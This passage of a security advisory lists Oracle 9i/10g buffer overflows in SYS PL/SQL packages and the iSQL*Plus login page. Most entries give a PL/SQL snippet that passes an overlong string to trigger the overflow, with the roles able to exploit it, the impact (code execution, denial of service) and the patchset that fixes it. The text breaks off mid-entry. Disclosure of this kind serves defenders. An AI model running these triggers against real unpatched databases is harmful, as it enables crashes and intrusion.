DBMS_REPCAT_CONF.ADD_PRIORITY_DATE
DBMS_REPCAT_CONF.ADD_PRIORITY_NCHAR
DBMS_REPCAT_CONF.ADD_PRIORITY_NUMBERv 
DBMS_REPCAT_CONF.ADD_PRIORITY_NVARCHAR2
DBMS_REPCAT_CONF.ADD_PRIORITY_RAW
DBMS_REPCAT_CONF.ADD_PRIORITY_VARCHAR2
DBMS_REPCAT_CONF.ADD_SITE_PRIORITY_SITE
DBMS_REPCAT_CONF.ADD_UNIQUE_RESOLUTION
DBMS_REPCAT_CONF.ADD_UPDATE_RESOLUTION
DBMS_REPCAT_CONF.ALTER_PRIORITY
DBMS_REPCAT_CONF.ALTER_PRIORITY_CHAR
DBMS_REPCAT_CONF.ALTER_PRIORITY_DATE
DBMS_REPCAT_CONF.ALTER_PRIORITY_NCHAR
DBMS_REPCAT_CONF.ALTER_PRIORITY_NUMBER
DBMS_REPCAT_CONF.ALTER_PRIORITY_NVARCHAR2
DBMS_REPCAT_CONF.ALTER_PRIORITY_RAW
DBMS_REPCAT_CONF.ALTER_PRIORITY_VARCHAR2
DBMS_REPCAT_CONF.ALTER_SITE_PRIORITY
DBMS_REPCAT_CONF.ALTER_SITE_PRIORITY_SITE
DBMS_REPCAT_CONF.CANCEL_STATISTICS
DBMS_REPCAT_CONF.CHECK_GROUP_INFO
DBMS_REPCAT_CONF.CHECK_ONAME_INFO
DBMS_REPCAT_CONF.COMMENT_ON_COLUMN_GROUP
DBMS_REPCAT_CONF.COMMENT_ON_DELETE_RESOLUTION
DBMS_REPCAT_CONF.COMMENT_ON_PRIORITY_GROUP
DBMS_REPCAT_CONF.COMMENT_ON_SITE_PRIORITY
DBMS_REPCAT_CONF.COMMENT_ON_UNIQUE_RESOLUTION
DBMS_REPCAT_CONF.COMMENT_ON_UPDATE_RESOLUTION
DBMS_REPCAT_CONF.DEFINE_COLUMN_GROUP
DBMS_REPCAT_CONF.DEFINE_PRIORITY_GROUP
DBMS_REPCAT_CONF.DEFINE_SITE_PRIORITY
DBMS_REPCAT_CONF.DROP_COLUMN_GROUP
DBMS_REPCAT_CONF.DROP_DELETE_RESOLUTION
DBMS_REPCAT_CONF.DROP_GROUPED_COLUMN
DBMS_REPCAT_CONF.DROP_PRIORITY
DBMS_REPCAT_CONF.DROP_PRIORITY_CHAR
DBMS_REPCAT_CONF.DROP_PRIORITY_DATE
DBMS_REPCAT_CONF.DROP_PRIORITY_GROUP
DBMS_REPCAT_CONF.DROP_PRIORITY_NCHAR
DBMS_REPCAT_CONF.DROP_PRIORITY_NUMBER
DBMS_REPCAT_CONF.DROP_PRIORITY_NVARCHAR2
DBMS_REPCAT_CONF.DROP_PRIORITY_RAW
DBMS_REPCAT_CONF.DROP_PRIORITY_VARCHAR2
DBMS_REPCAT_CONF.DROP_SITE_PRIORITY
DBMS_REPCAT_CONF.DROP_SITE_PRIORITY_SITE
DBMS_REPCAT_CONF.DROP_UNIQUE_RESOLUTION
DBMS_REPCAT_CONF.DROP_UPDATE_RESOLUTION
DBMS_REPCAT_CONF.MAKE_COLUMN_GROUP
DBMS_REPCAT_CONF.PURGE_STATISTICS
DBMS_REPCAT_CONF.REGISTER_STATISTICS
DBMS_REPCAT_FLA.ABORT_DEFINITION
DBMS_REPCAT_FLA.ABORT_FLAVOR_DEFINITION
DBMS_REPCAT_FLA.ADD_OBJECT
DBMS_REPCAT_FLA.ADD_OBJECT_TO_FLAVOR
DBMS_REPCAT_FLA.BEGIN_DEFINITION
DBMS_REPCAT_FLA.BEGIN_FLAVOR_DEFINITION
DBMS_REPCAT_FLA.DROP_OBJECT
DBMS_REPCAT_FLA.DROP_OBJECT_FROM_FLAVOR
DBMS_REPCAT_FLA.ENSURE_NOT_PUBLISHED
DBMS_REPCAT_FLA.GENERATE_FLAVOR_NAME
DBMS_REPCAT_FLA.LOCAL_OBJECT_MATCHES
DBMS_REPCAT_FLA.SET_LOCAL_FLAVOR
DBMS_REPCAT_FLA.VALIDATE_DEFINITION
DBMS_REPCAT_FLA.VALIDATE_FLAVOR_DEFINITION
DBMS_REPCAT_FLA.VALIDATE_FOR_LOCAL_FLAVOR
DBMS_REPCAT_FLA.VALIDATE_LOCAL
DBMS_REPCAT_FLA.VALIDATE_LOCAL_COLS
DBMS_REPCAT_FLA.VALIDATE_LOCAL_MAS
DBMS_REPCAT_FLA.VALIDATE_LOCAL_SNAP
DBMS_REPCAT_FLA.VALIDATE_TABLE
DBMS_REPCAT_FLA_MAS.ADD_COLUMN_GROUP_TO_FLAVOR
DBMS_REPCAT_FLA_MAS.ADD_COLUMNS_TO_FLAVOR
DBMS_REPCAT_FLA_MAS.DROP_COLUMN_GROUP_FROM_FLAVOR
DBMS_REPCAT_FLA_MAS.DROP_COLUMNS_FROM_FLAVOR
DBMS_REPCAT_FLA_MAS.OBSOLETE_DEFINITION
DBMS_REPCAT_FLA_MAS.OBSOLETE_FLAVOR_DEFINITION
DBMS_REPCAT_FLA_MAS.PUBLISH_DEFINITION
DBMS_REPCAT_FLA_MAS.PUBLISH_FLAVOR_DEFINITION
DBMS_REPCAT_FLA_MAS.PURGE_DEFINITION
DBMS_REPCAT_FLA_MAS.PURGE_FLAVOR_DEFINITION
DBMS_REPCAT_FLA_UTL.CANONICALIZE_FLAVOR
DBMS_REPCAT_FLA_UTL.CANONICALIZE_OBJECT
DBMS_REPCAT_INSTANTIATE.DROP_SITE_INSTANTIATION
DBMS_REPCAT_INSTANTIATE.INSTANTIATE_OFFLINE
DBMS_REPCAT_INSTANTIATE.INSTANTIATE_ONLINE
DBMS_REPCAT_MAS.ADD_MASTER_DATABASE
DBMS_REPCAT_MAS.ALTER_MASTER_PROPAGATION
DBMS_REPCAT_MAS.ALTER_MASTER_REPOBJECT
DBMS_REPCAT_MAS.COMMENT_ON_REPGROUP
DBMS_REPCAT_MAS.COMMENT_ON_REPOBJECT
DBMS_REPCAT_MAS.COMMENT_ON_REPSITES
DBMS_REPCAT_MAS.CREATE_MASTER_REPGROUP
DBMS_REPCAT_MAS.CREATE_MASTER_REPOBJECT
DBMS_REPCAT_MAS.DO_DEFERRED_REPCAT_ADMIN
DBMS_REPCAT_MAS.DROP_MASTER_REPGROUP
DBMS_REPCAT_MAS.ENSURE_MASTERDEF
DBMS_REPCAT_MAS.EXECUTE_DDL
DBMS_REPCAT_MAS.GENERATE_REPLICATION_PACKAGE
DBMS_REPCAT_MAS.GENERATE_REPLICATION_SUPPORT
DBMS_REPCAT_MAS.GENERATE_REPLICATION_TRIGGER
DBMS_REPCAT_MAS.PURGE_MASTER_LOG
DBMS_REPCAT_MAS.RELOCATE_MASTERDEF
DBMS_REPCAT_MAS.REMOVE_MASTER_DATABASES
DBMS_REPCAT_MAS.RENAME_SHADOW_COLUMN_GROUP
DBMS_REPCAT_MAS.RESUME_MASTER_ACTIVITY
DBMS_REPCAT_MAS.SEND_AND_COMPARE_OLD_VALUES
DBMS_REPCAT_MAS.SET_COLUMNS
DBMS_REPCAT_MAS.SUSPEND_MASTER_ACTIVITY
DBMS_REPCAT_MAS.WAIT_MASTER_LOG
DBMS_REPCAT_OBJ_UTL.LCNAME_TAB_TO_CNAME_TAB
DBMS_REPCAT_RGT.CHECK_DDL_TEXT
DBMS_REPCAT_RGT.CREATE_OBJECT_FROM_EXISTING
DBMS_REPCAT_RGT.DROP_SITE_INSTANTIATION
DBMS_REPCAT_RGT.INSTANTIATE_OFFLINE
DBMS_REPCAT_RGT.INSTANTIATE_ONLINE
DBMS_REPCAT_RGT_CUST.CREATE_OBJECT_FROM_EXISTING
DBMS_REPCAT_RPC.GET_OBJECT_SHAPE
DBMS_REPCAT_RPC.GET_OBJECT_SHAPE_RC
DBMS_REPCAT_RPC.RELOCATE_MASTERDEF
DBMS_REPCAT_RPC.RELOCATE_MASTERDEF_RC
DBMS_REPCAT_SNA.ALTER_SNAPSHOT_PROPAGATION
DBMS_REPCAT_SNA.CREATE_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA.CREATE_SNAPSHOT_REPOBJECT
DBMS_REPCAT_SNA.CREATE_SNAPSHOT_REPSCHEMA
DBMS_REPCAT_SNA.DROP_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA.DROP_SNAPSHOT_REPOBJECT
DBMS_REPCAT_SNA.DROP_SNAPSHOT_REPSCHEMA
DBMS_REPCAT_SNA.GENERATE_SNAPSHOT_SUPPORT
DBMS_REPCAT_SNA.REFRESH_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA.REFRESH_SNAPSHOT_REPSCHEMA
DBMS_REPCAT_SNA.REGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA.REPCAT_IMPORT_CHECK
DBMS_REPCAT_SNA.SET_LOCAL_FLAVOR
DBMS_REPCAT_SNA.SWITCH_SNAPSHOT_MASTER
DBMS_REPCAT_SNA.UNREGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA.VALIDATE_FOR_LOCAL_FLAVOR
DBMS_REPCAT_SNA_UTL.ALTER_SNAPSHOT_PROPAGATION
DBMS_REPCAT_SNA_UTL.CHECK_REGISTRATION_PARAMS
DBMS_REPCAT_SNA_UTL.CREATE_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA_UTL.CREATE_SNAPSHOT_REPOBJECT
DBMS_REPCAT_SNA_UTL.DROP_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA_UTL.DROP_SNAPSHOT_REPOBJECT
DBMS_REPCAT_SNA_UTL.GENERATE_SNAPSHOT_SUPPORT
DBMS_REPCAT_SNA_UTL.LOCAL_GENERATE_DDL
DBMS_REPCAT_SNA_UTL.REFRESH_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA_UTL.REGISTER_FLAVOR_CHANGE
DBMS_REPCAT_SNA_UTL.REGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA_UTL.REMOTE_GENERATE_DDL
DBMS_REPCAT_SNA_UTL.REPCAT_IMPORT_CHECK
DBMS_REPCAT_SNA_UTL.SWITCH_SNAPSHOT_MASTER
DBMS_REPCAT_SNA_UTL.UNREGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_SQL_UTL.DO_ARRAY_DDL
DBMS_REPCAT_SQL_UTL.DO_DDL
DBMS_REPCAT_SQL_UTL.DO_MULTIPLE_DDLS
DBMS_REPCAT_UNTRUSTED.REGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_UNTRUSTED.UNREGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_UTL.CANONICALIZE
DBMS_REPCAT_UTL.COMMENT_ON_REPSITES
DBMS_REPCAT_UTL.CONVERT_REASON_TO_ID
DBMS_REPCAT_UTL.CONVERT_TYPE_TO_ID
DBMS_REPCAT_UTL.DEFAULT_FUNCTION_NAME
DBMS_REPCAT_UTL.DROP_AN_OBJECT
DBMS_REPCAT_UTL.FOLLOW_SYNONYM_CHAIN
DBMS_REPCAT_UTL.GENERATE_WHAT_AM_I
DBMS_REPCAT_UTL.GET_REPCOLUMN_FLAG
DBMS_REPCAT_UTL.RESOLVE_NAME
DBMS_REPCAT_UTL.SET_REPCOLUMN_FLAG
DBMS_REPCAT_UTL2.CHECK_OBJECT_SHAPE
DBMS_REPCAT_UTL2.GET_OBJECT_SHAPE
DBMS_REPCAT_UTL3.RETRY_NEEDED
DBMS_REPCAT_UTL4.COMPARE_SOURCE
DBMS_REPCAT_UTL4.COMPARE_TABLES
DBMS_REPCAT_UTL4.DROP_MASTER_REPOBJECT
DBMS_REPCAT_UTL4.ENSURE_MASTER
DBMS_REPCAT_UTL4.MASTERDEF_PREFIX
DBMS_REPCAT_UTL4.NAME_CONFLICT_EXISTS
DBMS_REPCAT_VALIDATE.VALIDATE

To reproduce the overflow, execute the next PL/SQL:

BEGIN
SYS.DBMS_REPCAT_AUTH.GRANT_SURROGATE_REPCAT('longstring');
END;

or

BEGIN
SYS.DBMS_REPCAT_AUTH.REVOKE_SURROGATE_REPCAT('longstring');
END;

etc.

Analysis:
This vulnerability can be exploited by members of SYSDBA role and users 
granted execute permissions on the packages.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5). 10g not vulnerable.

#26 - Heap based buffer overflow Vulnerability in Oracle 10g iSQL*PLus 
Service
Details:
SQL*Plus is an interactive and batch query tool that is installed with 
every Oracle Database Server or Client installation. It has a command-line 
user interface, a Windows Graphical User Interface (GUI) and the iSQL*Plus 
web-based user interface. iSQL*Plus is a browser-based interface which 
uses the SQL*Plus processing engine. A heap overflow vulnerability exists 
on this service. To overflow the buffer you need to provide a long string 
in the 'username' or in the 'connectID' parameters of /isqlplus/login.uix

Analysis:
A remote unaunteticated user can execute arbitrary code in the context of 
the iSQLPlus Service.It can also be exploited to cause DOS (Denial of 
service) killing Oracle server process.

Vendor Fix:
Oracle 9i not affected. Fixed in Oracle 10g Patchset 1.

#27 - Buffer overflow in procedure AQ_TABLE_DEFN_UPDATE of 
DBMS_AQ_IMPORT_INTERNAL package
Details:
When AQ_TABLE_DEFN_UPDATE procedure is called with a long string in the 
QT_NAME parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE p_6_PRIMARY_INSTANCE BINARY_INTEGER;
p_7_SECONDARY_INSTANCE BINARY_INTEGER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA || AAA;
SYS.DBMS_AQ_IMPORT_INTERNAL.AQ_TABLE_DEFN_UPDATE (QT_SCHEMA => 'SYS', 
QT_NAME => AAA, UDATA => 1, QT_FLAGS => 1, SORT_COLS => 1,
PRIMARY_INSTANCE => p_6_PRIMARY_INSTANCE, SECONDARY_INSTANCE => 
p_7_SECONDARY_INSTANCE, COMMENT => 'Y');
END;

Analysis:
This vulnerability can be exploited by members of any of the following 
roles EXECUTE_CATALOG_ROLE, EXP_FULL_DATABASE, EXP_FULL_DATABASE, 
AQ_ADMINISTRATOR_ROLE, SYSDBA roles and users granted execute permissions 
on DBMS_AQ_IMPORT_INTERNAL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#28 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_GET_NRP of 
DBMS_AQADM package
Details:
When VERIFY_QUEUE_TYPES_GET_NRP procedure is called with a long string in 
the SRC_QUEUE_NAME parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
P_SRC_QUEUE_NAME VARCHAR2(32767);
P_DEST_QUEUE_NAME VARCHAR2(32767);
P_DESTINATION VARCHAR2(32767);
P_RC BINARY_INTEGER;
P_TRANSFORMATION VARCHAR2(32767);
BEGIN
P_SRC_QUEUE_NAME := 'longstring';
P_DEST_QUEUE_NAME := '';
P_DESTINATION := '';
P_TRANSFORMATION := '';
SYS.DBMS_AQADM.VERIFY_QUEUE_TYPES_GET_NRP(SRC_QUEUE_NAME => 
P_SRC_QUEUE_NAME, DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
P_DESTINATION, RC => P_RC, TRANSFORMATION => P_TRANSFORMATION);
END;

Analysis:
This vulnerability can be exploited by members of any of the following 
roles EXECUTE_CATALOG_ROLE, IMP_FULL_DATABASE, IMP_FULL_DATABASE, QS_ADM, 
QS, QS_WS, QS_ES, QS_OS, QS_CBADM, QS_CB, QS_CS, SYSDBA roles and users 
granted execute permissions on DBMS_AQADM package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#29 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_NO_QUEUE of 
DBMS_AQADM package
Details:
When VERIFY_QUEUE_TYPES_NO_QUEUE procedure is called with a long string in 
the SRC_QUEUE_NAME parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
P_SRC_QUEUE_NAME VARCHAR2(32767);
P_DEST_QUEUE_NAME VARCHAR2(32767);
P_DESTINATION VARCHAR2(32767);
P_RC BINARY_INTEGER;
P_TRANSFORMATION VARCHAR2(32767);
BEGIN
P_SRC_QUEUE_NAME := 'longstring';
P_DEST_QUEUE_NAME := '';
P_DESTINATION := '';
P_TRANSFORMATION := '';
SYS.DBMS_AQADM.VERIFY_QUEUE_TYPES_NO_QUEUE(SRC_QUEUE_NAME => 
P_SRC_QUEUE_NAME, DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
P_DESTINATION, RC => P_RC, TRANSFORMATION => P_TRANSFORMATION);
END;

Analysis:
This vulnerability can be exploited by members of any of the following 
roles EXECUTE_CATALOG_ROLE, IMP_FULL_DATABASE, IMP_FULL_DATABASE, QS_ADM, 
QS, QS_WS, QS_ES, QS_OS, QS_CBADM, QS_CB, QS_CS, SYSDBA roles and users 
granted execute permissions on DBMS_AQADM package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#30 - Buffer overflow in procedure VERIFY_QUEUE_TYPES of DBMS_AQADM_SYS 
package
Details:
When VERIFY_QUEUE_TYPES procedure is called with a long string in the 
SRC_QUEUE_NAME parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
P_SRC_QUEUE_NAME VARCHAR2(32767);
P_DEST_QUEUE_NAME VARCHAR2(32767);
P_DESTINATION VARCHAR2(32767);
P_TRANSFORMATION VARCHAR2(32767);
P_QUEUE_EXISTS BOOLEAN;
P_GET_NRP BOOLEAN;
P_RC BINARY_INTEGER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; 
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; 
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
P_SRC_QUEUE_NAME := AAA;
P_DEST_QUEUE_NAME := '';
P_DESTINATION := '';
P_TRANSFORMATION := '';
P_QUEUE_EXISTS := FALSE;
P_GET_NRP := FALSE;
SYS.DBMS_AQADM_SYS.VERIFY_QUEUE_TYPES(SRC_QUEUE_NAME => P_SRC_QUEUE_NAME, 
DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
P_DESTINATION, TRANSFORMATION => P_TRANSFORMATION, QUEUE_EXISTS =>
P_QUEUE_EXISTS, GET_NRP => P_GET_NRP, RC => P_RC);
END;

Analysis:
This vulnerability can be exploited by members of SYSDBA role and users 
granted execute permissions on DBMS_AQADM_SYS package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#31 - Buffer overflow in procedure PARALLEL_PUSH_RECOVERY of 
DBMS_DEFER_INTERNAL_SYS package
Details:
When PARALLEL_PUSH_RECOVERY procedure is called with a long string in the 
DESTINATION parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
P_DESTINATION VARCHAR2(32767);
P_ORIGIN VARCHAR2(32767);
BEGIN
P_DESTINATION := 'longstring';
P_ORIGIN := '';
SYS.DBMS_DEFER_INTERNAL_SYS.PARALLEL_PUSH_RECOVERY(DESTINATION => 
P_DESTINATION, ORIGIN => P_ORIGIN);
END;

Analysis:
This vulnerability can be exploited by members SYSDBA role and users 
granted execute permissions on DBMS_DEFER_INTERNAL_SYS package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#32 - Buffer overflow in procedure ENABLE_PROPAGATION_TO_DBLINK of 
DBMS_DEFER_REPCAT package
Details:
When ENABLE_PROPAGATION_TO_DBLINK procedure is called with a long string 
as the parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
RET_VALUE_X123 BOOLEAN;
BEGIN
RET_VALUE_X123 := 
SYS.DBMS_DEFER_REPCAT.ENABLE_PROPAGATION_TO_DBLINK('longstring');
END;

or

DECLARE a BOOLEAN; -- return value
BEGIN
a := SYS.DBMS_DEFER_REPCAT.ENABLE_PROPAGATION_TO_DBLINK (DBLINK => 
'longstring', NORMAL_ONLY => FALSE, INTERNAL_SET => FALSE);
END;

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA role and users granted execute permissions on DBMS_DEFER_REPCAT 
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#33 - Buffer overflow in procedure DISABLE_RECEIVER_TRACE of 
DBMS_INTERNAL_REPCAT package
Details:
When DISABLE_RECEIVER_TRACE procedure is called with a long string in the 
GNAME parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
SYS.DBMS_INTERNAL_REPCAT.DISABLE_RECEIVER_TRACE (GNAME => 'longstring');
END;

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA role and users granted execute permissions on DBMS_INTERNAL_REPCAT 
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#34 - Buffer overflow in procedure ENABLE_RECEIVER_TRACE of 
DBMS_INTERNAL_REPCAT package
Details:
When ENABLE_RECEIVER_TRACE procedure is called with a long string in the 
GNAME parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
SYS.DBMS_INTERNAL_REPCAT.ENABLE_RECEIVER_TRACE (GNAME => 'longstring');
END;

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA role and users granted execute permissions on DBMS_INTERNAL_REPCAT 
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#35 - Buffer overflow in procedure VALIDATE of DBMS_INTERNAL_REPCAT 
package
Details:
When VALIDATE procedure is called with a long string in the GNAME 
parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
RET_VALUE_X123 BINARY_INTEGER;
P_GNAME VARCHAR2(32767);
P_CHECK_GENFLAGS BOOLEAN;
P_CHECK_VALID_OBJS BOOLEAN;
P_CHECK_LINKS_SCHED BOOLEAN;
P_CHECK_LINKS BOOLEAN;
P_ERROR_MSG_ID NUMBER;
P_ERROR_NUM_ID NUMBER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA || AAA;
P_GNAME := AAA;
P_CHECK_GENFLAGS := FALSE;
P_CHECK_VALID_OBJS := FALSE;
P_CHECK_LINKS_SCHED := FALSE;
P_CHECK_LINKS := FALSE;
P_ERROR_MSG_ID := 1;
P_ERROR_NUM_ID := 1;
RET_VALUE_X123 := SYS.DBMS_INTERNAL_REPCAT.VALIDATE(GNAME => P_GNAME, 
CHECK_GENFLAGS => P_CHECK_GENFLAGS, CHECK_VALID_OBJS =>
P_CHECK_VALID_OBJS, CHECK_LINKS_SCHED => P_CHECK_LINKS_SCHED, CHECK_LINKS 
=> P_CHECK_LINKS, ERROR_MSG_ID => P_ERROR_MSG_ID, ERROR_NUM_ID =>
P_ERROR_NUM_ID);
END;

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA role and users granted execute permissions on DBMS_INTERNAL_REPCAT 
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#36 - Buffer overflow in procedure DIFFERENCES of DBMS_RECTIFIER_DIFF 
package
Details:
When DIFFERENCES procedure is called with a long string in the one of the 
parameters a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; 
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; 
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
SYS.DBMS_RECTIFIER_DIFF.DIFFERENCES (SNAME1 => 'Y', ONAME1 => 'Y', 
REFERENCE_SITE => 'Y', SNAME2 => 'Y', ONAME2 => 'Y', COMPARISON_SITE =>
'Y', WHERE_CLAUSE => 'Y', COLUMN_LIST => 'Y', MISSING_ROWS_SNAME => 'Y', 
MISSING_ROWS_ONAME1 => AAA, MISSING_ROWS_ONAME2 => 'Y',
MISSING_ROWS_SITE => 'Y', MAX_MISSING => 1, COMMIT_ROWS => 1);
END;

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA role and users granted execute permissions on DBMS_RECTIFIER_DIFF 
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#37 - Buffer overflow in procedure ADD_COLUMN of DBMS_REPCAT_RQ package
Details:
When ADD_COLUMN procedure is called with a long string in the SCHEMA_NAME 
parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
P_SCHEMA_NAME VARCHAR2(32767);
P_OBJECT_NAME VARCHAR2(32767);
P_COLUMN_NAME VARCHAR2(32767);
P_DDL_TEXT CLOB;
P_COLUMN_GROUP_NAME VARCHAR2(32767);
P_NEW_GROUP VARCHAR2(32767);
P_RETRY BOOLEAN;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; 
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; 
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
P_SCHEMA_NAME := AAA;
P_OBJECT_NAME := 'Y';
P_COLUMN_NAME := 'Y';
P_COLUMN_GROUP_NAME := 'Y';
P_NEW_GROUP := 'Y';
P_RETRY := FALSE;
SYS.DBMS_REPCAT_RQ.ADD_COLUMN(SCHEMA_NAME => P_SCHEMA_NAME, OBJECT_NAME => 
P_OBJECT_NAME, COLUMN_NAME => P_COLUMN_NAME, DDL_TEXT =>
P_DDL_TEXT, COLUMN_GROUP_NAME => P_COLUMN_GROUP_NAME, NEW_GROUP => 
P_NEW_GROUP, RETRY => P_RETRY);
END;

Analysis:
This vulnerability can be exploited by members of SYSDBA role and users 
granted execute permissions on DBMS_REPCAT_RQ package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#39 - Buffer overflow in procedure IS_MASTER of DBMS_REPCAT_UTL package
Details:
When IS_MASTER procedure is called with a long string in the CANON_GNAME 
parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
RET_VALUE_X123 BOOLEAN;
P_CANON_GOWNER VARCHAR2(32767);
P_CANON_GNAME VARCHAR2(32767);
P_MASTER VARCHAR2(32767);
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
P_CANON_GOWNER := '';
P_CANON_GNAME := AAA;
P_MASTER := '';
RET_VALUE_X123 := SYS.DBMS_REPCAT_UTL.IS_MASTER(CANON_GOWNER => 
P_CANON_GOWNER,CANON_GNAME => P_CANON_GNAME, MASTER => P_MASTER);
END;

Analysis:
